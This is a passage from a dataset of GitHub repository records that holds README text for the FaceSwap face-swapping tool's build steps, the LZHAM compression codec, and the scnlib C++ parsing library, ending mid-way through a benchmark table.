\"D:\\opencv\\opencv\\build\\include\"\n - \"D:\\dlib\\dlib-19.2\"\n * Note the path might be different if you have different dlib version\n - In the panel on the left choose Linker>General\n - In the Additional Library Directories add \"D:\\opencv\\opencv\\build\\x64\\vc14\\lib\"\n * Note the path might be different if you have different architecture or VS version\n - In the panel on the left choose Linker>Input\n - In the Additional Dependencies add \"opencv_world320d.lib\"\n - Click Apply\n \n- Change the Configuration in the top left to \"Release\" and repeat \n- Setup the configuration for the release\n - In the panel on the left choose C/C++\n - In the Additional Include Directories field add two directories:\n - \"D:\\opencv\\opencv\\build\\include\"\n - \"D:\\dlib\\dlib-19.2\"\n * Note the path might be different if you have different dlib version\n - In the panel on the left choose Linker>General\n - In the Additional Library Directories add \"D:\\opencv\\opencv\\build\\x64\\vc14\\lib\"\n * Note the path might be different if you have different architecture or VS version\n - In the panel on the left choose Linker>Input\n - In the Additional Dependencies add \"opencv_world320.lib\"\n\n- Close the property window\n- Right click Source Files in the Solution Explorer\n- Select \"Add Existing Item...\" and add the .cpp files from this project\n- Right click Header Files in the Solution Explorer\n- Select \"Add Existing Item...\" and add the .h files from this project\n- Copy 
haarcascade_frontalface_default.xml from OpenCV sources/data/haarcascades directory to project directory\n- Download shape_predictor_68_face_landmarks.dat from http://sourceforge.net/projects/dclib/files/dlib/v18.10/shape_predictor_68_face_landmarks.dat.bz2 and place in project directory \n\nAfter that FaceSwap should work. \n\n# Building on GNU/Linux\n\nIf you want to run this on Ubuntu 16.04 run this set of commands:\n\n sudo apt install libopencv-dev liblapack-dev libdlib-dev\n wget http://sourceforge.net/projects/dclib/files/dlib/v18.10/shape_predictor_68_face_landmarks.dat.bz2\n bunzip2 *.bz2\n ln -s /usr/share/opencv/haarcascades/haarcascade_frontalface_default.xml .\n\n g++ -std=c++1y *.cpp $(pkg-config --libs opencv lapack) -ldlib \n ./a.out\n \nSpecial thanks to https://github.com/nqzero for providing the build commands.\n\n# Building on MacOS\n\nSpecial thanks to https://github.com/shaunharker for providing the build commands.\n\n brew install lapack\n brew install openblas\n brew install opencv\n brew install dlib --with-openblas\n git clone https://github.com/hrastnik/FaceSwap.git\n cd FaceSwap\n wget http://sourceforge.net/projects/dclib/files/dlib/v18.10/shape_predictor_68_face_landmarks.dat.bz2\n bunzip2 *.bz2\n ln -s /usr/local/share/opencv/haarcascades/haarcascade_frontalface_default.xml .\n export PKG_CONFIG_PATH=/usr/local/opt/lapack/lib/pkgconfig:/usr/local/opt/openblas/lib/pkgconfig:$PKG_CONFIG_PATH\n g++ -std=c++1y *.cpp $(pkg-config --libs opencv lapack openblas) -ldlib\n mkdir bin\n mv a.out bin\n cd bin\n ./a.out\n\n# How does it work?\n\nThe algorithm searches until it finds two faces in the frame. Then it estimates facial landmarks using dlib face landmarks. Facial landmarks are used to \"cut\" the faces out of the frame and to estimate the transformation matrix used to move one face over the other.\n\nThe faces are then color corrected using histogram matching and in the end the edges of the faces are feathered and blended in the original frame.\n\n# Result\nBefore...\n\n[![Before](./images/before.jpg)](https://youtu.be/32i1ca8pcTg)\n\nAfter...\n\n[![After](./images/after.jpg)](https://youtu.be/32i1ca8pcTg)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "richgel999/lzham_codec", "link": "https://github.com/richgel999/lzham_codec", "tags": [], "stars": 652, "description": "Lossless data compression codec with LZMA-like ratios but 1.5x-8x faster decompression speed, C/C++", "lang": "C++", "repo_lang": "", "readme": "LZHAM - Lossless Data Compression Codec\n=============\n\nPublic Domain (see LICENSE)\n\n

LZHAM is a lossless data compression codec written in C/C++ (specifically C++03), with a compression ratio similar to LZMA but with 1.5x-8x faster decompression speed. It officially supports Linux x86/x64, Windows x86/x64, \nOSX, and iOS, with Android support on the way.

\n\nAn improved version of LZHAM, with better compression, is [here](https://github.com/richgel999/lzham_codec_devel).\n\n

The old alpha version of LZHAM (bitstream incompatible with the v1.x release) is here: https://github.com/richgel999/lzham_alpha

\n\n

### Introduction

\n\n

LZHAM is a lossless (LZ based) data compression codec optimized for particularly fast decompression at very high compression ratios with a zlib compatible API. \nIt's been developed over a period of 3 years and alpha versions have already shipped in many products. (The alpha is here: https://code.google.com/p/lzham/)\nLZHAM's decompressor is slower than zlib's, but generally much faster than LZMA's, with a compression ratio that is typically within a few percent of LZMA's and sometimes better.

\n\n

LZHAM's compressor is intended for offline use, but it is tested alongside the decompressor on mobile devices and is usable on the faster settings.

\n\n

LZHAM's decompressor currently has a higher cost to initialize than LZMA, so the threshold where LZHAM is typically faster vs. LZMA decompression is between 1,000 and 13,000 \n*compressed* output bytes, depending on the platform. It is not a good small block compressor: it likes large (10KB-15KB minimum) blocks.

\n\n

LZHAM has simple support for patch files (delta compression), but this is a side benefit of its design, not its primary use case. Internally it supports LZ matches up \nto ~64KB and very large dictionaries (up to .5 GB).

\n\n

LZHAM may be valuable to you if you compress data offline and distribute it to many customers, care about read/download times, and if decompression speed and low CPU/power use \nare important to you.

\n\n

I've been profiling LZHAM vs. LZMA and publishing the results on my blog: http://richg42.blogspot.com

\n\n

Some independent benchmarks of the previous alpha versions: http://heartofcomp.altervista.org/MOC/MOCADE.htm, http://mattmahoney.net/dc/text.html

\n\n

LZHAM has been integrated into the 7zip archiver (command line and GUI) as a custom codec plugin: http://richg42.blogspot.com/2015/02/lzham-10-integrated-into-7zip-command.html

\n\n

### 10GB Benchmark Results

\n\nResults with [7zip-LZHAM 9.38 32-bit](http://richg42.blogspot.com/2015/02/7zip-938-custom-codec-plugin-for-lzham.html) (64MB dictionary) on [Matt Mahoney's 10GB benchmark](http://mattmahoney.net/dc/10gb.html):\n\n```\nLZHAM (-mx=8): 3,577,047,629 Archive Test Time: 70.652 secs\nLZHAM (-mx=9): 3,573,782,721 Archive Test Time: 71.292 secs\nLZMA (-mx=9): 3,560,052,414 Archive Test Time: 223.050 secs\n7z .ZIP : 4,681,291,655 Archive Test Time: 73.304 secs (unzip v6 x64 test time: 61.074 secs)\n```\n\n

### Most Common Question: So how does it compare to other libs like LZ4?

\n\nThere is no single compression algorithm that perfectly suites all use cases and practical constraints. LZ4 and LZHAM are tools which lie at completely opposite ends of the spectrum:\n\n* LZ4: A symmetrical codec with very fast compression and decompression but very low ratios. Its compression ratio is typically less than even zlib's (which uses a 21+ year old algorithm). \nLZ4 does a good job of trading off a large amount of compression ratio for very fast overall throughput.\nUsage example: Reading LZMA/LZHAM/etc. compressed data from the network and decompressing it, then caching this data locally on disk using LZ4 to reduce disk usage and decrease future loading times.\n\n* LZHAM: A very asymmetrical codec with slow compression speed, but with a very competitive (LZMA-like) compression ratio and reasonably fast decompression speeds (slower than zlib, but faster than LZMA).\nLZHAM trades off a lot of compression throughput for very high ratios and higher decompression throughput relative to other codecs in its ratio class (which is LZMA, which runs circles around LZ4's ratio).\nUsage example: Compress your product's data once on a build server, distribute it to end users over a slow media like the internet, then decompress it on the end user's device.\n\n

### How Much Memory Does It Need?

\n\nFor decompression it's easy to compute:\n* Buffered mode: decomp_mem = dict_size + ~34KB for work tables\n* Unbuffered mode: decomp_mem = ~34KB\n\nI'll be honest here, the compressor is currently an angry beast when it comes to memory. The amount needed depends mostly on the compression level and dict. size. It's *approximately* (max_probes=128 at level -m4):\ncomp_mem = min(512 * 1024, dict_size / 8) * max_probes * 6 + dict_size * 9 + 22020096\n\nCompression mem usage examples from Windows lzhamtest_x64 (note the equation is pretty off for small dictionary sizes):\n* 32KB: 11MB\n* 128KB: 21MB\n* 512KB: 63MB\n* 1MB: 118MB\n* 8MB: 478MB\n* 64MB: 982MB\n* 128MB: 1558MB\n* 256MB: 2710MB\n* 512MB: 5014MB\n\n
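As a concrete illustration (not part of the original README), the memory rules above can be wrapped in a tiny helper. The function name is hypothetical; the constants are copied verbatim from the *approximate* formula quoted above (max_probes=128 at level -m4):\n\n```cpp\n#include <algorithm>\n#include <cstddef>\n#include <cstdio>\n\n// Hypothetical helper: evaluates the approximate compressor memory formula above.\n// Buffered-mode decompression memory is simply dict_size + ~34KB of work tables.\nstatic size_t comp_mem_estimate(size_t dict_size, size_t max_probes = 128)\n{\n    return std::min<size_t>(512 * 1024, dict_size / 8) * max_probes * 6\n         + dict_size * 9 + 22020096;\n}\n\nint main()\n{\n    const size_t dict_size = 64 * 1024 * 1024; // 64MB dictionary\n    // Prints roughly 981 (MB), matching the ~982MB entry in the table above.\n    std::printf(\"comp mem ~= %zu MB\", comp_mem_estimate(dict_size) >> 20);\n}\n```\n\n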

### Compressed Bitstream Compatibility

\n\n

v1.0's bitstream format is now locked in place, so any future v1.x releases will be backwards/forward compatible with compressed files \nwritten with v1.0. The only thing that could change this is a critical bugfix.

\n\n

Note LZHAM v1.x bitstreams are NOT backwards compatible with any of the previous alpha versions on Google Code.

\n\n

### Platforms/Compiler Support

\n\nLZHAM currently officially supports x86/x64 Linux, iOS, OSX, FreeBSD, and Windows x86/x64. At one time the codec compiled and ran fine on Xbox 360 (PPC, big endian). Android support is coming next.\nIt should be easy to retarget by modifying the macros in lzham_core.h.

\n\n

LZHAM has optional support for multithreaded compression. It supports gcc built-ins or MSVC intrinsics for atomic ops. For threading, it supports OSX-specific \nPthreads, generic Pthreads, or the Windows APIs.

\n\n

For compilers, I've tested with gcc, clang, and MSVC 2008, 2010, and 2013. In previous alphas I also compiled with TDM-GCC x64.

\n\n

### API

\n\nLZHAM supports streaming or memory to memory compression/decompression. See include/lzham.h. LZHAM can be linked statically or dynamically, just study the \nheaders and the lzhamtest project. \nOn Linux/OSX, it's only been tested with static linking so far.\n\nLZHAM also supports a usable subset of the zlib API with extensions, either include/zlib.h or #define LZHAM_DEFINE_ZLIB_API and use include/lzham.h.\n\n
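A minimal memory-to-memory sketch against the zlib-style surface mentioned above. It assumes the classic compressBound()/compress2()/uncompress() trio is part of the emulated subset; the README only promises a usable subset with extensions, so treat these exact entry points as an assumption rather than documented API:\n\n```cpp\n#define LZHAM_DEFINE_ZLIB_API\n#include \"include/lzham.h\"\n#include <cstring>\n#include <vector>\n\nint main()\n{\n    const char src[] = \"hello hello hello hello\";\n    uLong src_len = (uLong)sizeof(src);\n\n    // Compress (assumes compressBound()/compress2() are among the emulated calls).\n    uLong comp_len = compressBound(src_len);\n    std::vector<unsigned char> comp(comp_len);\n    if (compress2(comp.data(), &comp_len, (const unsigned char*)src, src_len, 9) != Z_OK)\n        return 1;\n\n    // Decompress back and verify the round trip.\n    uLong decomp_len = src_len;\n    std::vector<unsigned char> decomp(decomp_len);\n    if (uncompress(decomp.data(), &decomp_len, comp.data(), comp_len) != Z_OK)\n        return 2;\n    return std::memcmp(decomp.data(), src, src_len) != 0;\n}\n```\n\n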

### Usage Tips

\n\n* Always try to use the smallest dictionary size that makes sense for the file or block you are compressing, i.e. don't use a 128MB dictionary for a 15KB file. The codec\ndoesn't automatically choose for you because in streaming scenarios it has no idea how large the file or block will be.\n* The larger the dictionary, the more RAM is required during compression and decompression. I would avoid using more than 8-16MB dictionaries on iOS.\n* For faster decompression, prefer \"unbuffered\" decompression mode vs. buffered decompression (avoids a dictionary alloc and extra memcpy()'s), and disable adler-32 checking. Also, use the built-in LZHAM API's, not the\nzlib-style API's for fastest decompression.\n* Experiment with the \"m_table_update_rate\" compression/decompression parameter. This setting trades off a small amount of ratio for faster decompression.\nNote the m_table_update_rate decompression parameter MUST match the setting used during compression (same for the dictionary size). It's up to you to store this info somehow.\n* Avoid using LZHAM on small *compressed* blocks, where small is 1KB-10KB compressed bytes depending on the platform. LZHAM's decompressor is only faster than LZMA's beyond the small block threshold.\nOptimizing LZHAM's decompressor to reduce its startup time relative to LZMA is a high priority.\n* For best compression (I've seen up to ~4% better), enable the compressor's \"extreme\" parser, which is much slower but finds cheaper paths through a much denser parse graph.\nNote the extreme parser can greatly slow down on files containing large amounts of repeated data/strings, but it is guaranteed to finish.\n* The compressor's m_level parameter can make a big impact on compression speed. Level 0 (LZHAM_COMP_LEVEL_FASTEST) uses a much simpler greedy parser, and the other levels use \nnear-optimal parsing with different heuristic settings.\n* Check out the compressor/decompressor reinit() API's, which are useful if you'll be compressing or decompressing many times. Using the reinit() API's is a lot cheaper than fully \ninitializing/deinitializing the entire codec every time.\n* LZHAM's compressor is no speed demon. It's usually slower than LZMA's, sometimes by a wide (~2x slower or so) margin. In \"extreme\" parsing mode, it can be many times slower. \nThis codec was designed with offline compression in mind.\n* One significant difference between LZMA and LZHAM is how uncompressible files are handled. LZMA usually expands uncompressible files, and its decompressor can bog down and run extremely \nslowly on uncompressible data. LZHAM internally detects when each 512KB block is uncompressible and stores these blocks as uncompressed bytes instead. \nLZHAM's literal decoding is significantly faster than LZMA's, so the more plain literals in the output stream, the faster LZHAM's decompressor runs vs. LZMA's.\n* General advice (applies to LZMA and other codecs too): If you are compressing large amounts of serialized game assets, sort the serialized data by asset type and compress the whole thing as a single large \"solid\" block of data.\nDon't compress each individual asset, this will kill your ratio and have a higher decompression startup cost. If you need random access, consider compressing the assets lumped \ntogether into groups of a few hundred kilobytes (or whatever) each.\n* LZHAM is a raw codec. It doesn't include any sort of preprocessing: EXE rel to abs jump transformation, audio predictors, etc. That's up to you\nto do, before compression.\n\n
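Since the tips above stress that the decompressor must be handed the same dictionary size and table update rate that were used at compression time, one simple convention (purely illustrative, not an LZHAM file format) is to persist them in a tiny header in front of the compressed bytes:\n\n```cpp\n#include <cstdint>\n\n// Hypothetical container header; LZHAM itself does not define one, so the\n// caller has to store these settings somehow, as the tips above note.\n#pragma pack(push, 1)\nstruct lzham_blob_header\n{\n    uint32_t magic;             // sanity check, e.g. 0x4C5A4831\n    uint8_t  dict_size_log2;    // must match the compressor's dictionary size\n    uint8_t  table_update_rate; // must match m_table_update_rate\n    uint64_t uncompressed_size; // lets the reader allocate the output up front\n};\n#pragma pack(pop)\n```\n\n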

### Codec Test App

\n\nlzhamtest_x86/x64 is a simple command line test program that uses the LZHAM codec to compress/decompress single files. \nlzhamtest is not intended as a file archiver or end user tool, it's just a simple testbed.\n\n-- Usage examples:\n\n- Compress single file \"source_filename\" to \"compressed_filename\":\n\tlzhamtest_x64 c source_filename compressed_filename\n\t\n- Decompress single file \"compressed_filename\" to \"decompressed_filename\":\n lzhamtest_x64 d compressed_filename decompressed_filename\n\n- Compress single file \"source_filename\" to \"compressed_filename\", then verify the compressed file decompresses properly to the source file:\n\tlzhamtest_x64 -v c source_filename compressed_filename\n\n- Recursively compress all files under specified directory and verify that each file decompresses properly:\n\tlzhamtest_x64 -v a c:\\source_path\n\t\n-- Options\t\n\t\n- Set dictionary size used during compressed to 1MB (2^20):\n\tlzhamtest_x64 -d20 c source_filename compressed_filename\n\t\nValid dictionary sizes are [15,26] for x86, and [15,29] for x64. (See LZHAM_MIN_DICT_SIZE_LOG2, etc. defines in include/lzham.h.)\nThe x86 version defaults to 64MB (26), and the x64 version defaults to 256MB (28). I wouldn't recommend setting the dictionary size to \n512MB unless your machine has more than 4GB of physical memory.\n\n- Set compression level to fastest:\n\tlzhamtest_x64 -m0 c source_filename compressed_filename\n\t\n- Set compression level to uber (the default):\n\tlzhamtest_x64 -m4 c source_filename compressed_filename\n\t\n- For best possible compression, use -d29 to enable the largest dictionary size (512MB) and the -x option which enables more rigorous (but ~4X slower!) parsing:\n\tlzhamtest_x64 -d29 -x -m4 c source_filename compressed_filename\n\nSee lzhamtest_x86/x64.exe's help text for more command line parameters.\n\n

Compiling LZHAM

\n\n- Linux: Use \"cmake .\" then \"make\". The cmake script only supports Linux at the moment. (Sorry, working on build systems is a drag.)\n- OSX/iOS: Use the included XCode project. (NOTE: I haven't merged this over yet. It's coming!)\n- Windows: Use the included VS 2010 project\n\nIMPORTANT: With clang or gcc compile LZHAM with \"No strict aliasing\" ENABLED: -fno-strict-aliasing\n\nI DO NOT test or develop the codec with strict aliasing:\n* https://lkml.org/lkml/2003/2/26/158\n* http://stackoverflow.com/questions/2958633/gcc-strict-aliasing-and-horror-stories\n\nIt might work fine, I don't know yet. This is usually not a problem with MSVC, which defaults to strict aliasing being off.\n\n

ANSI C/C++

\n\nLZHAM supports compiling as plain vanilla ANSI C/C++. To see how the codec configures itself, check out lzham_core.h and search for \"LZHAM_ANSI_CPLUSPLUS\". \nAll platform-specific functionality (unaligned loads, threading, atomic ops, etc.) should be disabled when this macro is defined. Note that the compressor doesn't use threads \nor atomic operations when built this way, so it's going to be pretty slow. (The compressor was built from the ground up to be threaded.)\n\n
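As a sketch of what that compile-time gating looks like (every macro name here other than LZHAM_ANSI_CPLUSPLUS is made up for illustration; see lzham_core.h for the real logic):

```cpp
// Hypothetical sketch of feature gating in the plain ANSI C/C++ build mode.
#if defined(LZHAM_ANSI_CPLUSPLUS)
    // Pure ANSI build: portable fallbacks only.
    #define EXAMPLE_USE_UNALIGNED_LOADS 0   // byte-by-byte loads instead
    #define EXAMPLE_USE_THREADS 0           // single-threaded compressor
    #define EXAMPLE_USE_ATOMICS 0
#else
    // Platform-specific fast paths enabled.
    #define EXAMPLE_USE_UNALIGNED_LOADS 1
    #define EXAMPLE_USE_THREADS 1
    #define EXAMPLE_USE_ATOMICS 1
#endif
```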

Known Problems

\n\n

LZHAM's decompressor is like a drag racer that needs time to get up to speed. LZHAM is not intended or optimized to be used on \"small\" blocks of data (less \nthan ~10,000 bytes of *compressed* data on desktops, or around 1,000-5,000 bytes on iOS). If your use case involves calling the codec over and over with tiny blocks, \nthen LZMA, LZ4, Deflate, etc. are probably better choices.

\n\n

The decompressor still takes too long to init vs. LZMA. On iOS the cost is not that bad, but on desktop the cost is high. I have reduced the startup cost vs. the \nalpha but there's still work to do.

\n\n

The compressor is slower than I would like, and doesn't scale as well as it could. I added a reinit() method to make it initialize faster, but it's not a speed demon. \nMy focus has been on ratio and decompression speed.

\n\n

I use tabs = 3 spaces, but I think some actual tab characters got into the code. I need to run the sources through ClangFormat or whatever.

\n\n

Special Thanks

\n\n

Thanks to everyone at the http://encode.ru forums. I read these forums as a lurker before working on LZHAM, and I studied every LZ-related \npost I could get my hands on, especially anything related to LZ optimal parsing, which still seems like a black art. LZHAM was my way of \nlearning how to implement optimal parsing (and you can see this if you study the progress I made in the early alphas on Google Code).

\n\n

Also, thanks to Igor Pavlov, the original creator of LZMA and 7-Zip, for advancing the state of the art in LZ compression.

\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eliaskosunen/scnlib", "link": "https://github.com/eliaskosunen/scnlib", "tags": ["c-plus-plus", "cpp", "scanf", "input", "io", "parsing", "ranges", "header-only"], "stars": 652, "description": "scanf for modern C++", "lang": "C++", "repo_lang": "", "readme": "# scnlib\n\n[![Ubuntu 20 builds](https://github.com/eliaskosunen/scnlib/actions/workflows/ubuntu-20.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/ubuntu-20.yml)\n[![Ubuntu 18 builds](https://github.com/eliaskosunen/scnlib/actions/workflows/ubuntu-18.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/ubuntu-18.yml)\n[![macOS builds](https://github.com/eliaskosunen/scnlib/actions/workflows/macos.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/macos.yml)\n[![Windows builds](https://github.com/eliaskosunen/scnlib/actions/workflows/windows.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/windows.yml)\n[![Alpine builds](https://github.com/eliaskosunen/scnlib/actions/workflows/alpine.yml/badge.svg?branch=master)](https://github.com/eliaskosunen/scnlib/actions/workflows/alpine.yml)\n[![Code Coverage](https://codecov.io/gh/eliaskosunen/scnlib/branch/master/graph/badge.svg?token=LyWrDluna1)](https://codecov.io/gh/eliaskosunen/scnlib)\n\n[![Latest Release](https://img.shields.io/github/v/release/eliaskosunen/scnlib?sort=semver&display_name=tag)](https://github.com/eliaskosunen/scnlib/releases)\n[![License](https://img.shields.io/github/license/eliaskosunen/scnlib.svg)](https://github.com/eliaskosunen/scnlib/blob/master/LICENSE)\n[![C++ Standard](https://img.shields.io/badge/C%2B%2B-11%2F14%2F17%2F20%2F23-blue.svg)](https://img.shields.io/badge/C%2B%2B-11%2F14%2F17%2F20%2F23-blue.svg)\n\n```cpp\n#include \n#include \n\nint main() {\n int i;\n // Read an integer from stdin\n // with an accompanying message\n scn::prompt(\"What's your favorite number? \", \"{}\", i);\n printf(\"Oh, cool, %d!\", i);\n}\n\n// Example result:\n// What's your favorite number? 
42\n// Oh, cool, 42!\n```\n\n## What is this?\n\n`scnlib` is a modern C++ library for replacing `scanf` and `std::istream`.\nThis library attempts to move us ever closer to replacing `iostream`s and C stdio altogether.\nIt's faster than `iostream` (see Benchmarks) and type-safe, unlike `scanf`.\nThink [{fmt}](https://github.com/fmtlib/fmt) but in the other direction.\n\nThis library is the reference implementation of the ISO C++ standards proposal\n[P1729 \"Text Parsing\"](https://wg21.link/p1729).\n\nThe library is currently deemed production-ready, and should be reasonably bug-free;\nit's tested and fuzzed extensively.\n\nThe master-branch of the repository targets the next minor release (v1.2), and is backwards-compatible.\nThe dev-branch targets the next major release (v2.0), and may contain backwards-incompatible changes, and may have lacking documentation.\n\n## Documentation\n\nThe documentation can be found online at https://scnlib.readthedocs.io.\n\nTo build the docs yourself, build the `doc` and `doc-sphinx` targets generated by CMake.\nThe `doc` target requires Doxygen, and `doc-sphinx` requires Python 3.8, Sphinx and Breathe.\n\n## Examples\n\n### Reading a `std::string`\n\n```cpp\n#include <scn/scn.h>\n#include <iostream>\n#include <string>\n\nint main() {\n std::string word;\n auto result = scn::scan(\"Hello world\", \"{}\", word);\n\n std::cout << word << '\\n'; // Will output \"Hello\"\n std::cout << result.range_as_string() << '\\n'; // Will output \" world\"\n}\n```\n\n### Reading multiple values\n\n```cpp\n#include <scn/scn.h>\n\nint main() {\n int i, j;\n auto result = scn::scan(\"123 456 foo\", \"{} {}\", i, j);\n // result == true\n // i == 123\n // j == 456\n\n std::string str;\n result = scn::scan(result.range(), \"{}\", str);\n // result == true\n // str == \"foo\"\n}\n```\n\n### Using the `tuple`-return API\n\n```cpp\n#include <scn/scn.h>\n#include <scn/tuple_return.h>\n\nint main() {\n auto [r, i] = scn::scan_tuple<int>(\"42\", \"{}\");\n // r is a result object, contextually convertible to `bool`\n // i == 42\n}\n```\n\n### Error handling\n\n```cpp\n#include <scn/scn.h>\n#include <iostream>\n#include <string>\n\nint main() {\n int i;\n // \"foo\" is not a valid integer\n auto result = scn::scan(\"foo\", \"{}\", i);\n if (!result) {\n // i is not touched (still unconstructed)\n // result.range() == \"foo\" (range not advanced)\n std::cout << \"Integer parsing failed with message: \" << result.error().msg() << '\\n';\n }\n}\n```\n\n## Features\n\n - Blazing-fast parsing of values (see benchmarks)\n - Modern C++ interface, featuring type safety (variadic templates), convenience (ranges) and customizability\n - No << chevron >> hell\n - Requires C++11 or newer\n - \"{python}\"-like format string syntax\n - Optionally header only\n - Minimal code size increase (see benchmarks)\n - No exceptions (supports building with `-fno-exceptions -fno-rtti` with minimal loss of functionality)\n - Localization requires exceptions, because of the way `std::locale` is\n - Unicode-aware\n\n## Installing\n\n`scnlib` uses CMake.\nIf your project already uses CMake, integration is easy.\nFirst, clone, build, and install the library:\n\n```sh\n# Wherever you cloned scnlib to\n$ mkdir build\n$ cd build\n$ cmake ..\n$ make -j\n$ make install\n```\n\nThen, in your project:\n\n```cmake\n# Find scnlib package\nfind_package(scn CONFIG REQUIRED)\n\n# Target which you'd like to use scnlib\n# scn::scn-header-only to use the header-only version\nadd_executable(my_program ...)\ntarget_link_libraries(my_program scn::scn)\n```\n\nAlternatively, if you have `scnlib` downloaded somewhere, or maybe 
even bundled inside your project (like a git submodule),\nyou can use `add_subdirectory`:\n\n```cmake\nadd_subdirectory(path/to/scnlib)\n\n# like above\nadd_executable(my_program ...)\ntarget_link_libraries(my_program scn::scn)\n```\n\nSee docs for usage without CMake.\n\n## Compiler support\n\nEvery commit is tested with\n * gcc 5.5 and newer (until v11)\n * clang 6.0 and newer (until v13)\n * Visual Studio 2019 and 2022\n * clang 12 and gcc 11 on macOS Catalina\n\nwith very extreme warning flags (see cmake/flags.cmake) and with multiple build configurations for each compiler.\n\nOther compilers and compiler versions may work, but it is not guaranteed.\nIf your compiler does not work, it may be a bug in the library.\nHowever, support will not be provided for:\n\n * GCC 4.9 (or earlier): C++11 support is too buggy\n * VS 2015 (or earlier): unable to handle templates\n\nVS 2017 is not tested, as GitHub Actions has deprecated the support for it.\nThe last commit tested and verified to work with VS 2017 is\n[32be3f9](https://github.com/eliaskosunen/scnlib/commit/32be3f9) (post-v0.4).\n\nThe code is only tested on amd64 machines (both win32 and win64 on Windows),\nbecause that's the only architecture GitHub Actions has runners for.\nThe last commit tested and verified to work with both 32-bit and 64-bit ARM and PPC is\n[0621443](https://github.com/eliaskosunen/scnlib/commit/0621443) (v1.1).\n\n## Benchmarks\n\n### Run-time performance\n\n![Benchmark results](benchmark/runtime/results.png?raw=true \"Benchmark results\")\n\nThese benchmarks were run on a Ubuntu 21.10 machine running kernel version 5.13.0-30, with an Intel Core i7-8565U processor, and compiled with gcc version 11.2.0, with `-O3 -DNDEBUG -march=native`.\nThe source code for the benchmarks can be seen in the `benchmark` directory.\n\nYou can run the benchmarks yourself by enabling `SCN_BENCHMARKS`.\n`SCN_BENCHMARKS` is enabled by default if `scn` is the root CMake project, and disabled otherwise.\n\n```sh\n$ cd build\n$ cmake -DCMAKE_BUILD_TYPE=Release -DSCN_BENCHMARKS=ON -DSCN_USE_NATIVE_ARCH=ON -DCMAKE_INTERPROCEDURAL_OPTIMIZATION=ON ..\n$ make -j\n# choose benchmark to run in ./benchmark/runtime/*/bench-*\n$ ./benchmark/runtime/integer/bench-int\n```\n\nTimes are in nanoseconds of CPU time. Lower is better.\n\n#### Integer parsing (`int`)\n\n| Test | `std::stringstream` | `sscanf` | `scn::scan` | `scn::scan_default` |\n| :----- |--------------------:|---------:|------------:|--------------------:|\n| Test 1 | 344 | 127 | 65.1 | 55.3 |\n| Test 2 | 81.2 | 651 | 68.3 | 64.8 |\n\n#### Floating-point parsing (`double`)\n\n| Test | `std::stringstream` | `sscanf` | `scn::scan` | `scn::scan_default` |\n| :----- |--------------------:|---------:|------------:|--------------------:|\n| Test 1 | 612 | 211 | 69.5 | 69.1 |\n| Test 2 | 200 | 510 | 83.4 | 75.3 |\n\n#### Reading random whitespace-separated strings\n\n| Character type | `std::stringstream` | `scn::scan` | `scn::scan` and `string_view` |\n| :------------- |--------------------:|------------:|------------------------------:|\n| `char` | 63.3 | 56.9 | 51.0 |\n| `wchar_t` | 157 | 58.8 | 62.8 |\n\n#### Conclusions\n\n`scn::scan` is faster than the standard library offerings in all cases, sometimes over 8x faster.\n\nUsing `scn::scan_default` can sometimes have a slight performance benefit over `scn::scan`.\n\n#### Test 1 vs. 
Test 2\n\nIn the above comparisons:\n\n * \"Test 1\" refers to parsing a single value from a string which only contains the string representation for that value.\n The time used for constructing parser state is included.\n For example, the source string could be `\"123\"`.\n In this case, a parser is constructed, and a value (`123`) is parsed.\n This test is called \"single\" in the benchmark sources.\n * \"Test 2\" refers to the average time of parsing a value from a string containing multiple string representations separated by spaces.\n The time used for constructing parser state is not included.\n For example, the source string could be `\"123 456\"`.\n In this case, a parser is constructed before the timer is started.\n Then, a single value is read from the source, and the source is advanced to the start of the next value.\n The time it took to parse a single value is averaged out.\n This test is called \"repeated\" in the benchmark sources.\n\n### Executable size\n\nExecutable size benchmarks test generated code bloat for nontrivial projects.\nIt generates 25 translation units and reads values from stdin five times to simulate a medium sized project.\nThe resulting executable size is shown in the following tables and graphs.\nThe \"stripped size\" metric shows the size of the executable after running `strip`.\n\nThe code was compiled on Ubuntu 21.10 with g++ 11.2.0.\n`scnlib` is linked dynamically to level out the playing field compared to already dynamically linked `libc` and `libstdc++`.\nSee the directory `benchmark/bloat` for more information, e.g. templates for each TU.\n\nTo run these tests yourself:\n\n```sh\n$ cd build\n# For Debug\n$ cmake -DCMAKE_BUILD_TYPE=Debug -DSCN_BUILD_BLOAT=ON -DSCN_BUILD_BUILDTIME=OFF -DSCN_TESTS=OFF -DSCN_EXAMPLES=OFF -DBUILD_SHARED_LIBS=ON -DSCN_INSTALL=OFF ..\n# For Release\n$ cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INTERPROCEDURAL_OPTIMIZATION=ON -DSCN_BUILD_BLOAT=ON -DSCN_BUILD_BUILDTIME=OFF -DSCN_TESTS=OFF -DSCN_EXAMPLES=OFF -DBUILD_SHARED_LIBS=ON -DSCN_INSTALL=OFF ..\n# For Minimized Release\n$ cmake -DCMAKE_BUILD_TYPE=MinSizeRel -DCMAKE_INTERPROCEDURAL_OPTIMIZATION=ON -DSCN_BUILD_BLOAT=ON -DSCN_BUILD_BUILDTIME=OFF -DSCN_TESTS=OFF -DSCN_EXAMPLES=OFF -DBUILD_SHARED_LIBS=ON -DSCN_INSTALL=OFF ..\n\n$ make -j\n$ ./benchmark/bloat/run-bloat-tests.py ./benchmark/bloat\n```\n\nSizes are in kibibytes (KiB).\nLower is better.\n\n#### Minimized build (-Os -DNDEBUG)\n\n| Method | Executable size | Stripped size |\n| :------------------------------ | --------------: | ------------: |\n| empty | 15.4 | 14.0 |\n| `std::scanf` | 17.0 | 14.2 |\n| `std::istream` | 18.6 | 14.2 |\n| `scn::input` | 18.4 | 14.2 |\n| `scn::input` (header-only) | 120 | 94.3 |\n| `scn::scan_value` | 18.1 | 14.2 |\n| `scn::scan_value` (header-only) | 100 | 78.3 |\n\n![Benchmark results](benchmark/bloat/results_minsizerel.png?raw=true \"Benchmark results\")\n\n#### Release build (-O3 -DNDEBUG)\n\n| Method | Executable size | Stripped size |\n| 